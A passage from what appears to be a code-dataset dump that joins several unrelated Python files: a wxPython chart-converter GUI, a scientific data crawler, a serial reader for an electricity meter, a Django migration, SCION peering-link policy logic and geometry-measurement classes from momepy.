    """Terminate the server process, ignoring errors if it is already gone."""
    if self.server is not None:
      try:
        self.server.terminate()
      except:
        pass
  def checkServerRunning(self):
    """Poll the server process, sync the UI state, and return whether it runs."""
    if self.server is not None:
      try:
        if self.server.poll() is None:
          #still running
          if not self.serverRunning:
            self.serverPid.SetLabel(str(self.server.pid))
            self.serverPid.SetForegroundColour(wx.Colour(0,255, 0))
            self.btStartServer.SetLabel("Stop Server")
            self.serverRunning=True
          return True
      except:
        try:
          self.server.terminate()
        except:
          pass
    #seems to be not running
    if self.serverRunning:
      self.serverPid.SetLabel("server stopped")
      self.serverPid.SetForegroundColour(wx.Colour(255,0, 0))
      self.btStartServer.SetLabel("Start Server")
      self.serverRunning=False
    return False
  def checkConverterRunning(self):
    """Poll the converter; when it ends, optionally start the server; return running."""
    if self.converter is not None:
      try:
        if self.converter.poll() is None:
          return True
        #we stopped
        if self.startServer.IsChecked():
          self.doStartServer()
        self.btStart.SetLabel("Start")
      except:
        self.btStart.SetLabel("Start")
        try:
          self.converter.terminate()
        except:
          pass
      self.converter=None
    return False
  def terminateConverter(self):
    """Terminate the converter process if it is still running."""
    if self.checkConverterRunning():
      try:
        self.converter.terminate()
      except:
        pass
  def btStartServerClicked(self, event):
    """Toggle the server: stop it when running, start it otherwise."""
    if self.serverRunning:
      self.terminateServer()
      self.checkServerRunning()
      return
    self.doStartServer()
  def OnTimer(self,evt):
    """500ms timer tick: refresh both child-process states."""
    self.checkServerRunning()
    self.checkConverterRunning()
  def btSelectInputClicked(self, event):
    """Let the user pick chart files and append them to the input list."""
    openFileDialog = wx.FileDialog(self, "Select Chart files or directories", "", "",
                                     "all (*.*)|*.*", wx.FD_OPEN | wx.FD_FILE_MUST_EXIST|wx.FD_MULTIPLE)
    if openFileDialog.ShowModal() == wx.ID_CANCEL:
      return # the user changed idea...
    filenames=openFileDialog.GetPaths()
    for name in filenames:
      self.inputFiles.AppendText("\n"+name)
  def btEmptyClicked(self, event):
    """Clear the input file list."""
    self.inputFiles.Clear()
  def btStartClicked(self, event):
    """Start the chart converter, or stop it if it is already running."""
    if self.checkConverterRunning():
      self.terminateConverter()
      return
    files=re.split("\n",self.inputFiles.GetValue())
    selectedFiles=[]
    for f in files:
      if f != "":
        selectedFiles.append(f)
    if len(selectedFiles) < 1:
      wx.MessageBox("no files selected")
      return
    log=[]
    # NOTE(review): the cbLogfile checkbox is effectively ignored — the log
    # arguments are always added by the unconditional assignment below; confirm
    # whether the assignment was meant to live inside the if-branch.
    if self.cbLogfile.IsChecked():
      pass
    log=["-e" ,self.txLogfile.GetValue()]
    args=["xterm","-T","Avnav Chartconvert","-hold","-e",os.path.join(self.getBaseDir(),"..","chartconvert","read_charts.py")]+log+[ "-b",self.outputDir.GetValue()]
    if self.cbNewGemf.IsChecked():
      args.append("-g")
    if self.updateMode.IsChecked():
      args.append("-f")
    for name in selectedFiles:
      args.append(name)
    self.converter=subprocess.Popen(args,cwd=self.getBaseDir())
    self.btStart.SetLabel("Stop")
    self.checkConverterRunning()
  def btOutDefaultClicked(self, event):
    """Reset the output directory to the default."""
    self.outputDir.SetValue(self.defaultOut)
  def btSelectOutClicked(self, event):
    """Choose the output directory via a directory dialog."""
    openFileDialog = wx.DirDialog(self, "Select Output Dir", style=1,defaultPath=self.defaultOut)
    if openFileDialog.ShowModal() == wx.ID_CANCEL:
      return # the user changed idea...
    self.outputDir.SetValue(openFileDialog.GetPath())
  def btLogfileClicked(self, event):
    """Choose the converter log file via a file dialog."""
    openFileDialog = wx.FileDialog(self, "Select Logfile", style=1,defaultFile=self.txLogfile.GetValue())
    if openFileDialog.ShowModal() == wx.ID_CANCEL:
      return # the user changed idea...
    self.txLogfile.SetValue(openFileDialog.GetPath())
if __name__ == "__main__":
  # NOTE(review): wx.PySimpleApp is deprecated in modern wxPython (wx.App is
  # the replacement) — confirm the targeted wx version.
  app = wx.PySimpleApp(0)
  #wx.InitAllImageHandlers()
  argv=sys.argv
  usage="usage: %s [-b basedir] [-v viewerbase] " % (argv[0])
  parser = optparse.OptionParser(
    usage = usage,
    version="1.0",
    description='avnav_gui')
  parser.add_option("-b", "--basedir", dest="basedir", help="set the basedir for the server")
  parser.add_option("-u", "--urlmap", dest="urlmap", help="set some urlmap for the server")
  (options, args) = parser.parse_args(argv[1:])
  frame_1 = AvnavGui(None, -1, "")
  # Forward the optional CLI overrides to the frame before showing it.
  if not options.basedir is None:
    frame_1.setServerBase(options.basedir)
  if not options.urlmap is None:
    frame_1.setUrlMap(options.urlmap)
  app.SetTopWindow(frame_1)
  frame_1.Show()
  app.MainLoop()
| 8,486 | 2,575 |
#!/usr/bin/env python
# -----------------------------------------------------------------------------
# Name: crawlAll.py
# Purpose: Crawl and catalog using crawler config in crawler directory.
#
# Author: Gerald Manipon
#
# Created: Wed Nov 29 18:42:34 2006
# Copyright: (c) 2006, California Institute of Technology.
# U.S. Government Sponsorship acknowledged.
# -----------------------------------------------------------------------------
import getpass
import glob
import os
import sys
import tempfile
import time
import traceback
from datetime import datetime as DT
from sciflo.catalog import *
from sciflo.utils import *
# check if currently running; if not, lock; otherwise exit immediately
lockFile = os.path.join(tempfile.gettempdir(),
                        'crawler.%s.lck' % getpass.getuser())
if os.path.exists(lockFile):
    with open(lockFile, 'r') as lf:
        lockingPid = lf.read()
    # /proc/<pid> existing means the locking process is still alive.
    if os.path.isdir(os.path.join('/proc', lockingPid)) and lockingPid != '':
        print(("%s: Process %s already running." %
               (DT.utcfromtimestamp(time.time()).isoformat(), lockingPid)))
        sys.exit(0)
    else:
        print(("%s: Zombie process? Removed lock with pid %s." %
               (DT.utcfromtimestamp(time.time()).isoformat(), lockingPid)))
        os.unlink(lockFile)
# create lock file recording our pid so concurrent runs can detect us
currentPid = str(os.getpid())
with open(lockFile, 'w') as f:
    f.write(currentPid)
# read catalog database connection settings
scp = ScifloConfigParser()
dbPort = scp.getParameter('dbPort')
dbUser = scp.getParameter('dbUser')
dbPassword = scp.getParameter('dbPassword')
if dbUser in [None, 'None', '']:
    schema = 'mysql://127.0.0.1:%s/urlCatalog' % dbPort
else:
    if dbPassword in [None, 'None', '']:
        schema = 'mysql://%s@127.0.0.1:%s/urlCatalog' % (dbUser, dbPort)
    else:
        schema = 'mysql://%s:%s@127.0.0.1:%s/urlCatalog' % (
            dbUser, dbPassword, dbPort)
crawlerConfigDir = os.path.join(sys.prefix, 'etc', 'crawler')
# crawl either the configs passed on the command line or all installed ones
if len(sys.argv) == 1:
    xmlConfigFiles = glob.glob(os.path.join(crawlerConfigDir, '*.xml'))
else:
    xmlConfigFiles = sys.argv[1:]
for xmlConfigFile in xmlConfigFiles:
    try:
        print(("Doing", xmlConfigFile))
        libobj = ScifloLibrarian(xmlConfigFile)
        instr = libobj.getInstrument()
        level = libobj.getLevel()
        catalogobj = SqlAlchemyCatalog(schema)
        libobj.setCatalog(catalogobj)
        retval = libobj.crawlAndCatalog(page=True)
        print(("Finished crawlAndCatalog() with: ", retval))
    except Exception:
        # Abort on the first failing crawler config.  The lock file is left
        # behind on purpose; the zombie check above reaps it on the next run.
        traceback.print_exc()
        raise SystemExit(1)
# remove lock file
os.unlink(lockFile)
print(("%s: Script finished. Removed lock with pid %s." %
       (DT.utcfromtimestamp(time.time()).isoformat(), currentPid)))
| 2,714 | 907 |
"""
Communication with APATOR EC3 power meter to get its actual readings.
"""
from __future__ import annotations
__author__ = 'Holger Fleischmann'
__copyright__ = 'Copyright 2021, Holger Fleischmann, Bavaria/Germany'
__license__ = 'Apache License 2.0'
import logging
import time
from typing import NamedTuple, Optional, Callable, List
import serial
from serial import SEVENBITS, PARITY_EVEN, SerialException
from utils import RepeatTimer
logger = logging.getLogger().getChild(__name__)
class PowerMeterReading(NamedTuple):
    """One result of querying the meter.

    ``success`` is False when serial communication failed.  The kWh values
    are ``None`` when the corresponding OBIS line could not be parsed; the
    total is only filled in when both tariff values are present.
    """
    success: bool
    consumption_total_sum_kwh: Optional[float]
    consumption_high_sum_kwh: Optional[float]
    consumption_low_sum_kwh: Optional[float]
class PowerMeterApatorEC3:
    """
    Communication object to get readings from an APATOR EC3 electrical power meter.

    Tested only with a 12EC3 two tariff version to get the readings for the
    1.8.1 and 1.8.2 OBIS values.  Unfortunately, this meter does not provide
    any actual effective power values.

    Uses serial communication with the front IR interface.  Sends a request
    to the power meter and reads its response, i.e. a bidirectional TX/RX
    infrared interface must be connected to the serial port.

    Communication needs quite long timeouts and delays because the meter is
    really slow.
    """
    serial_port: str
    _serial: Optional[serial.Serial]

    def __init__(self, serial_port: str):
        """
        Create new communication object for power meter.
        Does not yet open the serial port.
        :param serial_port: serial port to use, e.g. "COM5" on Windows or "/dev/serialUSB0" on Linux
        """
        self.serial_port = serial_port
        self._serial = None

    def open(self) -> None:
        """
        Open the serial port if not open yet. Don't forget to close it when not needed any more.
        :raises: serial.serialutil.SerialException
        """
        if self._serial is None:
            logger.info("Opening serial port " + self.serial_port)
            # 300 baud / 7 data bits / even parity matches the classic
            # IEC 62056-21 optical readout used by the '/?!' sign-on below.
            self._serial = \
                serial.Serial(self.serial_port,
                              baudrate=300, bytesize=SEVENBITS, parity=PARITY_EVEN,
                              timeout=10)

    def close(self) -> None:
        """
        Close the serial port if open.
        """
        if self._serial is not None:
            logger.info("Closing serial port " + self.serial_port)
            self._serial.close()
            self._serial = None

    def read_raw(self) -> str:
        """
        Read the raw response from the power meter.
        :return: raw response string
        :raises: serial.serialutil.SerialException if communication failed
        """
        logger.debug("Sending request on serial port ...")
        request = b'/?!\r\n'
        self._serial.write(request)
        self._serial.flush()
        time.sleep(2)
        ack_output = b'\x06000\r\n'
        self._serial.write(ack_output)
        self._serial.flush()
        time.sleep(2)
        logger.debug("Reading response from serial port ...")
        data = self._serial.read(65536)
        # Decode once and reuse (the meter answers 7-bit ASCII).
        text = data.decode("ascii")
        if text:
            logger.debug("Response:\n" + text)
        return text

    def read(self) -> PowerMeterReading:
        """
        Try to read values from the power meter. Automatically opens the serial interface
        if not yet open. Closes it upon SerialException to force reopening on next attempt.
        :return: reading with values for the case of success, empty reading in case of failure
        """
        try:
            self.open()
            return self._parse_raw(self.read_raw())
        except SerialException:
            self.close()
            return PowerMeterReading(False, None, None, None)

    def _parse_raw(self, raw: str) -> PowerMeterReading:
        """Parse a raw meter response.

        Scans for the OBIS lines ``1.8.1*`` (high tariff) and ``1.8.2*``
        (low tariff); the total is only computed when both were found.
        """
        high = None
        low = None
        for line in raw.splitlines(keepends=False):
            cleaned = line.strip('\x02\x03\n\r \t')
            if cleaned.startswith("1.8.1*"):
                high = self._parse_line_float(cleaned)
            elif cleaned.startswith("1.8.2*"):
                low = self._parse_line_float(cleaned)
        if high is not None and low is not None:
            total = high + low
        else:
            total = None
        return PowerMeterReading(True, total, high, low)

    def _parse_line_str(self, cleaned_line: str) -> Optional[str]:
        """Return the text between the first '(' and the last ')' of a line.

        Returns None when either parenthesis is missing or in the wrong
        order.  Bug fix: the previous check compared ``find(...) + 1``
        against -1, so a missing '(' was never detected and malformed
        lines like ``"broken)"`` yielded garbage.
        """
        begin = cleaned_line.find("(")
        end = cleaned_line.rfind(")")
        if begin != -1 and end != -1 and end > begin:
            return cleaned_line[begin + 1:end]
        return None

    def _parse_line_float(self, cleaned_line: str) -> Optional[float]:
        """Parse the parenthesised value of a line as float, or None."""
        try:
            return float(self._parse_line_str(cleaned_line))
        except (TypeError, ValueError):
            # TypeError: no value was extracted (None); ValueError: the
            # extracted value is not numeric.
            return None
class SingleCounter:
    """Derives an average power value for one tariff from successive kWh
    counter readings.

    Power can only be computed between two "edges" -- polls at which the
    counter value actually changed -- because the counter resolution is
    coarse compared to the polling interval.
    """
    _prev_reading: Optional[float]
    _prev_was_edge: bool
    power: Optional[float]
    power_from_ts: Optional[float]
    power_to_ts: Optional[float]
    def __init__(self):
        # No reading seen yet; power is unknown until two edges occurred.
        self._prev_reading = None
        self._prev_was_edge = False
        self.power = None
        self.power_from_ts = None
        self.power_to_ts = None
    def update(self, reading_kwh: Optional[float], reading_ts: float, min_averaging_secs: float,
               other_counter: SingleCounter):
        # Only react when a value is present, it differs from the previous
        # one, and at least min_averaging_secs passed since the last edge.
        if reading_kwh is not None \
                and self._prev_reading != reading_kwh \
                and (self.power_to_ts is None or (reading_ts - self.power_to_ts) >= min_averaging_secs):
            if self._prev_was_edge and self.power_to_ts is not None:
                # kWh delta over elapsed seconds -> average watts
                # (1 kWh = 3.6e6 Ws).
                self.power = (reading_kwh - self._prev_reading) * 3.6e6 / \
                             (reading_ts - self.power_to_ts)
                self.power_from_ts = self.power_to_ts
                # The sibling tariff counter is forced to zero power over the
                # same span -- presumably because only one tariff advances at
                # a time on this meter; confirm against meter behaviour.
                other_counter.power = 0
                other_counter.power_from_ts = self.power_from_ts
                other_counter._prev_was_edge = True
            if self._prev_reading is not None:
                self._prev_was_edge = True
            self._prev_reading = reading_kwh
            self.power_to_ts = reading_ts
class PowerMeterApatorEC3Repeating:
    """Polls a PowerMeterApatorEC3 on a fixed interval from a background
    timer and derives per-tariff average power via two SingleCounters.
    """
    min_averaging_secs: float
    _power_meter: PowerMeterApatorEC3
    _timer: RepeatTimer
    reading: Optional[PowerMeterReading]
    reading_ts: Optional[float]
    success: bool
    high: SingleCounter
    low: SingleCounter
    callbacks: List[Callable[[Optional[PowerMeterReading]], None]]
    def __init__(self, power_meter: PowerMeterApatorEC3, interval: float, min_averaging_secs: float):
        # interval: seconds between polls; min_averaging_secs: minimum span
        # between counter edges used for power averaging (see SingleCounter).
        self.min_averaging_secs = min_averaging_secs
        self._power_meter = power_meter
        self._timer = RepeatTimer(interval, self._acquire)
        self.reading = None
        self.reading_ts = None
        self.success = False
        self.high = SingleCounter()
        self.low = SingleCounter()
        self.callbacks = []
    def add_callback(self, callback: Callable[[Optional[PowerMeterReading]], None]):
        # Callbacks are invoked after every poll attempt (see _fire).
        self.callbacks.append(callback)
    def start(self):
        # Idempotent: only starts the timer when it is not already running.
        if not self._timer.is_alive():
            self._timer.start()
    def stop(self):
        # Stop polling and release the serial port.
        self._timer.cancel()
        self._power_meter.close()
    def _acquire(self):
        # Timer callback: take one reading, update derived powers, notify.
        try:
            ts = time.time()
            self.reading = self._power_meter.read()
            self.reading_ts = ts
            # High is updated before low; SingleCounter.update mutates the
            # sibling counter on an edge, so do not swap this order without
            # checking SingleCounter.update.
            self._update_high_power()
            self._update_low_power()
            self.success = True
        except SerialException:
            self.success = False
        self._fire()
    def _update_low_power(self):
        self.low.update(self.reading.consumption_low_sum_kwh, self.reading_ts, self.min_averaging_secs, self.high)
    def _update_high_power(self):
        self.high.update(self.reading.consumption_high_sum_kwh, self.reading_ts, self.min_averaging_secs, self.low)
    def _fire(self):
        # Notify all listeners with the latest reading (check self.success
        # and reading.success for failures).
        for callback in self.callbacks:
            callback(self.reading)
if __name__ == '__main__':
    # Ad-hoc smoke test: poll the meter on COM5 every 30 s (10 s minimum
    # power-averaging window) and dump each reading to stdout.
    pm = PowerMeterApatorEC3Repeating(PowerMeterApatorEC3("COM5"), 30, 10)
    pm.callbacks.append(lambda r: print(pm.success, r, pm.reading_ts, pm.low.power, pm.high.power))
    pm.start()
| 8,162 | 2,449 |
# Generated by Django 2.2 on 2019-04-21 21:40
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated by Django 2.2: tightens two ForeignKeys from nullable
    # to required (preserve_default=False drops the one-off default after
    # back-filling existing rows).
    # NOTE(review): ``default=True`` on a ForeignKey is coerced to pk=1 when
    # back-filling -- presumably intentional for this one-off migration;
    # confirm that pk=1 is the intended fallback row.
    dependencies = [
        ('core', '0008_auto_20190421_1144'),
    ]
    operations = [
        migrations.AlterField(
            model_name='brafitting',
            name='fitting_user',
            field=models.ForeignKey(blank=True, default=True, on_delete=django.db.models.deletion.CASCADE, related_name='fittings', to=settings.AUTH_USER_MODEL),
            preserve_default=False,
        ),
        migrations.AlterField(
            model_name='suggestion',
            name='fitting_session',
            field=models.ForeignKey(blank=True, default=True, on_delete=django.db.models.deletion.CASCADE, related_name='suggestions', to='core.BraFitting'),
            preserve_default=False,
        ),
    ]
| 913 | 302 |
"""Functions for updating links according to peering policies"""
from django.db import transaction
from django.db.models import Q, QuerySet
from peering_coord.api.client_connection import ClientRegistry
from peering_coord.api.peering_pb2 import AsyncError
from peering_coord.models.ixp import VLAN, Interface, Owner
from peering_coord.models.policies import (
AsPeerPolicy, DefaultPolicy, IsdPeerPolicy, OwnerPeerPolicy)
from peering_coord.models.scion import AS, AcceptedPeer, Link
@transaction.atomic
def update_accepted_peers(vlan: VLAN, asys: AS) -> None:
    """Synchronize the AcceptedPeer relation of `asys` with its policies.

    Re-evaluates the peering policies and applies only the delta to the
    stored AcceptedPeer rows.

    :param vlan: Peering VLAN to update.
    :param asys: AS whose accepted peers are updated.
    """
    current = AcceptedPeer.objects.filter(vlan=vlan, asys=asys).values_list('peer_id')
    desired = _get_accepted_peers(vlan, asys)
    # Delta between what is stored and what the policies say.
    to_remove = current.difference(desired)
    to_add = desired.difference(current)
    # Drop rows for peers that are no longer accepted.
    AcceptedPeer.objects.filter(vlan=vlan, asys=asys, peer_id__in=to_remove).delete()
    # Insert rows for newly accepted peers.
    AcceptedPeer.objects.bulk_create(
        AcceptedPeer(vlan=vlan, asys=asys, peer_id=entry[0]) for entry in to_add)
def _get_accepted_peers(vlan: VLAN, asys: AS) -> QuerySet:
    """Get the set of ASes `asys` accepts for peering.

    Policies combine from most to least specific: an explicit AS-level
    rejection overrides owner-level accepts, and AS/owner-level rejections
    override ISD-level accepts and the default-accept policy (see the
    difference() chains below).

    :param vlan: Peering VLAN considered by the query.
    :param asys: AS whose potential peers are retrieved.
    :returns: A `QuerySet` of AS primary keys as returned by `values_list`.
    """
    # AS-level policies
    as_accept = AsPeerPolicy.objects.filter(
        vlan=vlan, asys=asys, accept=True).values_list('peer_as_id')
    as_reject = AsPeerPolicy.objects.filter(
        vlan=vlan, asys=asys, accept=False).values_list('peer_as_id')
    # Owner-level policies
    org_accept = Owner.objects.filter(
        id__in=OwnerPeerPolicy.objects.filter(
            vlan=vlan, asys=asys, accept=True).values_list('peer_owner_id'))
    org_reject = Owner.objects.filter(
        id__in=OwnerPeerPolicy.objects.filter(
            vlan=vlan, asys=asys, accept=False).values_list('peer_owner_id'))
    # ISD-level policies
    isd_accept = IsdPeerPolicy.objects.filter(
        vlan=vlan, asys=asys, accept=True).values_list('peer_isd_id')
    isd_reject = IsdPeerPolicy.objects.filter(
        vlan=vlan, asys=asys, accept=False).values_list('peer_isd_id')
    # Put it all together
    # Note: The same AS/Owner/ISD cannot be accepted *and* rejected at the same time.
    # The ~Q(id=asys.id) filters keep an AS from ever accepting itself.
    as_accepted_by_org = AS.objects.filter(
        Q(owner_id__in=org_accept) & ~Q(id=asys.id)).values_list('id')
    as_rejected_by_org = AS.objects.filter(
        Q(owner_id__in=org_reject) & ~Q(id=asys.id)).values_list('id')
    as_accepted_by_isd = AS.objects.filter(
        Q(isd_id__in=isd_accept) & ~Q(id=asys.id)).values_list('id')
    accept = as_accept.union(
        as_accepted_by_org.difference(as_reject),
        as_accepted_by_isd.difference(as_rejected_by_org, as_reject)
    )
    # Handle default accept policy: accept every other VLAN member that is
    # not rejected at any level.
    if DefaultPolicy.objects.filter(vlan=vlan, asys=asys, accept=True).exists():
        as_rejected_by_isd = AS.objects.filter(
            Q(isd_id__in=isd_reject) & ~Q(id=asys.id)).values_list('id')
        as_all = vlan.members.values_list('asys', flat=True).filter(~Q(asys=asys.id)).distinct()
        accept = accept.union(as_all.difference(as_rejected_by_isd, as_rejected_by_org, as_reject))
    return accept
@transaction.atomic
def update_links(vlan: VLAN, asys: AS) -> None:
    """Create and delete links of the given AS to reflect the peering accepted by it and its peers.

    Uses accepted peerings from the AcceptedPeer relation instead of evaluating the peering
    policies directly. update_accepted_peers() must have been called on every AS whose policies
    changed for this function to see up-to-date data.

    :param vlan: Peering VLAN to update.
    :param asys: AS whose links are updated.
    """
    connected = asys.query_connected_peers(vlan=vlan)          # links that exist now
    desired = asys.query_mutually_accepted_peers(vlan=vlan)    # links that should exist
    stale = connected.difference(desired)
    missing = desired.difference(connected)
    # Tear down links to peers that are no longer mutually accepted.  Both
    # interfaces of a link are always in the same VLAN, so filtering on
    # interface_a's VLAN is sufficient.
    Link.objects.filter(
        Q(interface_a__vlan=vlan)
        & (Q(interface_a__peering_client__asys=asys, interface_b__peering_client__asys__in=stale)
           | Q(interface_a__peering_client__asys__in=stale, interface_b__peering_client__asys=asys))
    ).delete()
    # Establish links to newly accepted peers.
    for row in missing:
        _create_links(vlan, asys, AS.objects.get(id=row[0]))
def _create_links(vlan: VLAN, as_a: AS, as_b: AS):
    """Create links between all interfaces of `as_a` and `as_b` in `vlan`.

    The link type is determined from the AS types: core-core -> CORE,
    non-core/non-core -> PEERING, core/non-core in the same ISD -> PROVIDER
    (with the core AS normalized to side A).  A core/non-core pair in
    different ISDs is rejected and both ASes are notified asynchronously.
    Interface pairs whose port range is exhausted are skipped; the affected
    owner is notified instead of raising.
    """
    # Figure out which link type to use.
    if as_a.is_core and as_b.is_core:
        link_type = Link.Type.CORE
    elif not as_a.is_core and not as_b.is_core:
        link_type = Link.Type.PEERING
    elif as_a.isd == as_b.isd:
        link_type = Link.Type.PROVIDER
        # Normalize so the core AS is always side A of the link.
        if not as_a.is_core and as_b.is_core:
            as_a, as_b = as_b, as_a
    else:
        error = AsyncError()
        error.code = AsyncError.Code.LINK_CREATION_FAILED
        error.message = "Cannot create a link between ASes {} and {} of incompatible type.".format(
            as_a, as_b
        )
        ClientRegistry.send_async_error(as_a.asn, error)
        ClientRegistry.send_async_error(as_b.asn, error)
        return
    # One link per interface pair within the VLAN.
    for interface_a in as_a.query_interfaces().filter(vlan=vlan).all():
        for interface_b in as_b.query_interfaces().filter(vlan=vlan).all():
            port_a = port_b = None
            try:
                port_a = interface_a.get_unused_port()
            except Interface.NoUnusedPorts:
                error = AsyncError()
                error.code = AsyncError.Code.LINK_CREATION_FAILED
                error.message = "Allocated port range is exhausted on interface {}.".format(
                    interface_a)
                ClientRegistry.send_async_error(as_a.asn, error)
            try:
                port_b = interface_b.get_unused_port()
            except Interface.NoUnusedPorts:
                error = AsyncError()
                error.code = AsyncError.Code.LINK_CREATION_FAILED
                error.message = "Allocated port range is exhausted on interface {}.".format(
                    interface_b)
                ClientRegistry.send_async_error(as_b.asn, error)
            # Only create the link when both sides got a free port.
            if port_a and port_b:
                Link.objects.create(link_type,
                                    interface_a=interface_a, interface_b=interface_b,
                                    port_a=port_a, port_b=port_b)
| 6,939 | 2,372 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# dimension.py
# definitions of dimension characters
import math
import numpy as np
import pandas as pd
import scipy as sp
from shapely.geometry import LineString, Point, Polygon
from tqdm import tqdm
from .shape import _make_circle
__all__ = [
"Area",
"Perimeter",
"Volume",
"FloorArea",
"CourtyardArea",
"LongestAxisLength",
"AverageCharacter",
"StreetProfile",
"WeightedCharacter",
"CoveredArea",
"PerimeterWall",
"SegmentsLength",
]
class Area:
    """
    Measures the area of every object in the given GeoDataFrame.

    Works for any suitable element (building footprint, plot, tessellation
    cell, block). Thin wrapper around GeoPandas ``.area`` kept for API
    consistency within momepy.

    Parameters
    ----------
    gdf : GeoDataFrame
        GeoDataFrame containing objects to analyse

    Attributes
    ----------
    series : Series
        Series containing resulting values
    gdf : GeoDataFrame
        original GeoDataFrame

    Examples
    --------
    >>> buildings = gpd.read_file(momepy.datasets.get_path('bubenec'), layer='buildings')
    >>> buildings['area'] = momepy.Area(buildings).series
    >>> buildings.area[0]
    728.5574947044363
    """

    def __init__(self, gdf):
        self.gdf = gdf
        self.series = gdf.geometry.area
class Perimeter:
    """
    Measures the perimeter of every object in the given GeoDataFrame.

    Works for any suitable element (building footprint, plot, tessellation
    cell, block). Thin wrapper around GeoPandas ``.length`` kept for API
    consistency within momepy.

    Parameters
    ----------
    gdf : GeoDataFrame
        GeoDataFrame containing objects to analyse

    Attributes
    ----------
    series : Series
        Series containing resulting values
    gdf : GeoDataFrame
        original GeoDataFrame

    Examples
    --------
    >>> buildings = gpd.read_file(momepy.datasets.get_path('bubenec'), layer='buildings')
    >>> buildings['perimeter'] = momepy.Perimeter(buildings).series
    >>> buildings.perimeter[0]
    137.18630991119903
    """

    def __init__(self, gdf):
        self.gdf = gdf
        self.series = gdf.geometry.length
class Volume:
    """
    Calculates volume of each object in given GeoDataFrame based on its height and area.

    .. math::
        area * height

    Parameters
    ----------
    gdf : GeoDataFrame
        GeoDataFrame containing objects to analyse
    heights : str, list, np.array, pd.Series
        the name of the dataframe column, ``np.array``, or ``pd.Series`` where is stored height value
    areas : str, list, np.array, pd.Series (default None)
        the name of the dataframe column, ``np.array``, or ``pd.Series`` where is stored area value. If set to None, function will calculate areas
        during the process without saving them separately.

    Raises
    ------
    KeyError
        If a column name passed as `heights` or `areas` does not exist.

    Attributes
    ----------
    series : Series
        Series containing resulting values
    gdf : GeoDataFrame
        original GeoDataFrame
    heights : Series
        Series containing used heights values
    areas : GeoDataFrame
        Series containing used areas values

    Examples
    --------
    >>> buildings['volume'] = momepy.Volume(buildings, heights='height_col').series
    >>> buildings.volume[0]
    7285.5749470443625
    >>> buildings['volume'] = momepy.Volume(buildings, heights='height_col', areas='area_col').series
    >>> buildings.volume[0]
    7285.5749470443625
    """

    def __init__(self, gdf, heights, areas=None):
        self.gdf = gdf
        gdf = gdf.copy()
        # Guard the column lookups: this is where a missing column name
        # actually raises KeyError.  (Previously the except wrapped only the
        # multiplication, which cannot raise KeyError, so it was dead code.)
        try:
            if not isinstance(heights, str):
                gdf["mm_h"] = heights
                heights = "mm_h"
            self.heights = gdf[heights]
            if areas is not None:
                if not isinstance(areas, str):
                    gdf["mm_a"] = areas
                    areas = "mm_a"
                self.areas = gdf[areas]
            else:
                # Compute areas on the fly when none were supplied.
                self.areas = gdf.geometry.area
        except KeyError:
            raise KeyError(
                "ERROR: Column not found. Define heights and areas or set areas to None."
            )
        self.series = self.areas * self.heights
class FloorArea:
    """
    Calculates floor area of each object based on height and area.

    The number of floors is simplified into the formula ``height // 3``
    (one floor is assumed to be approximately 3 metres).

    .. math::
        area * \\frac{height}{3}

    Parameters
    ----------
    gdf : GeoDataFrame
        GeoDataFrame containing objects to analyse
    heights : str, list, np.array, pd.Series
        the name of the dataframe column, ``np.array``, or ``pd.Series`` where is stored height value
    areas : str, list, np.array, pd.Series (default None)
        the name of the dataframe column, ``np.array``, or ``pd.Series`` where is stored area value. If set to None, function will calculate areas
        during the process without saving them separately.

    Raises
    ------
    KeyError
        If a column name passed as `heights` or `areas` does not exist.

    Attributes
    ----------
    series : Series
        Series containing resulting values
    gdf : GeoDataFrame
        original GeoDataFrame
    heights : Series
        Series containing used heights values
    areas : GeoDataFrame
        Series containing used areas values

    Examples
    --------
    >>> buildings['floor_area'] = momepy.FloorArea(buildings, heights='height_col').series
    >>> buildings.floor_area[0]
    2185.672484113309
    >>> buildings['floor_area'] = momepy.FloorArea(buildings, heights='height_col', areas='area_col').series
    >>> buildings.floor_area[0]
    2185.672484113309
    """

    def __init__(self, gdf, heights, areas=None):
        self.gdf = gdf
        gdf = gdf.copy()
        # Guard the column lookups: this is where a missing column name
        # actually raises KeyError.  (Previously the except wrapped only the
        # arithmetic below, which cannot raise KeyError, so it was dead code.)
        try:
            if not isinstance(heights, str):
                gdf["mm_h"] = heights
                heights = "mm_h"
            self.heights = gdf[heights]
            if areas is not None:
                if not isinstance(areas, str):
                    gdf["mm_a"] = areas
                    areas = "mm_a"
                self.areas = gdf[areas]
            else:
                # Compute areas on the fly when none were supplied.
                self.areas = gdf.geometry.area
        except KeyError:
            raise KeyError(
                "ERROR: Column not found. Define heights and areas or set areas to None."
            )
        # Floor count approximated as height // 3 (≈3 m per floor).
        self.series = self.areas * (self.heights // 3)
class CourtyardArea:
    """
    Measures the area of holes (courtyards) within each geometry.

    The courtyard area is the area of the filled exterior ring minus the
    polygon's own area. Ensure that your geometry is
    ``shapely.geometry.Polygon``.

    Parameters
    ----------
    gdf : GeoDataFrame
        GeoDataFrame containing objects to analyse
    areas : str, list, np.array, pd.Series (default None)
        the name of the dataframe column, ``np.array``, or ``pd.Series`` where is stored area value. If set to None, function will calculate areas
        during the process without saving them separately.

    Attributes
    ----------
    series : Series
        Series containing resulting values
    gdf : GeoDataFrame
        original GeoDataFrame
    areas : GeoDataFrame
        Series containing used areas values

    Examples
    --------
    >>> buildings['courtyard_area'] = momepy.CourtyardArea(buildings).series
    >>> buildings.courtyard_area[80]
    353.33274206543274
    """

    def __init__(self, gdf, areas=None):
        self.gdf = gdf
        gdf = gdf.copy()
        if areas is None:
            areas = gdf.geometry.area
        if not isinstance(areas, str):
            gdf["mm_a"] = areas
            areas = "mm_a"
        self.areas = gdf[areas]
        # Polygon built from the exterior ring alone == holes filled in.
        filled = gdf.geometry.apply(lambda geom: Polygon(geom.exterior))
        self.series = pd.Series(filled.area - gdf[areas], index=gdf.index)
# diameter of the minimal circumscribed circle around the given points
def _longest_axis(points):
    return _make_circle(points)[2] * 2
class LongestAxisLength:
    """
    Measures the length of each object's longest axis.

    The axis is defined as the diameter of the minimal circumscribed circle
    around the convex hull; it does not have to lie fully inside the object.

    .. math::
        \\max \\left\\{d_{1}, d_{2}, \\ldots, d_{n}\\right\\}

    Parameters
    ----------
    gdf : GeoDataFrame
        GeoDataFrame containing objects to analyse

    Attributes
    ----------
    series : Series
        Series containing resulting values
    gdf : GeoDataFrame
        original GeoDataFrame

    Examples
    --------
    >>> buildings['lal'] = momepy.LongestAxisLength(buildings).series
    >>> buildings.lal[0]
    40.2655616057102
    """
